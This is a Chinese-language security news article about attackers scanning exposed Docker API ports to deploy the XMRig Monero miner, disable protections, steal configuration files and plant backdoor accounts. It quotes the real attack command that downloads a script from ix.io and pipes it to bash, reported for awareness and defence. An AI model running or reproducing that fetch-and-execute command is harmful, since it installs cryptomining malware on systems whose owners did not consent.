随着越来越多关键应用搬上Docker,也成为黑客下手的目标。安全厂商发现黑客近日正在网络上扫瞄暴露出的API,意图植入挖矿程序利用受害者系统资源谋利,还会关闭系统的防护机制或留下后门。
Bad Packets侦测到从本周日(11月24日)午夜起,出现针对Docker系统的罕见大量扫瞄网络活动,利用扫瞄工具Zmap扫瞄TCP port 2375、2376、2377、4243。这波流量疑似是黑客攻击前的侦察性扫瞄。
ZDNet引述Bad Packets公司研究长Troy Mursch报道,目前黑客一共扫瞄了高达近5.9万个IP网络来寻找暴露的Docker执行实例。一旦找到受害系统的API,攻击者就会利用API端点激活Alpine Linux容器,并执行指令“chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash”。该指令可用于下载、执行Bash script,目的在安装Monero挖矿程序XMRig。而在观察到这波流量后2天,黑客已经挖到价值740美元的Monero币。
安全公司另外还发现,黑客还会通过一台远程服务器下载script到受害Docker系统上,企图关闭已知的防火墙及其他安全防护、删除别的挖矿僵尸网络的程序行程,且扫瞄、加密受害主机上的rConfig设置文件,将之传到黑客的C&C服务器。另一家安全企业SandflySecurity分析则显示它还会留下后门账号、SSH密钥,以及变更主机设置,以便未来更方便控制及访问主机。
安全公司建议用户尽快关闭Docker API传输端口,并删除掉所有不认识的容器。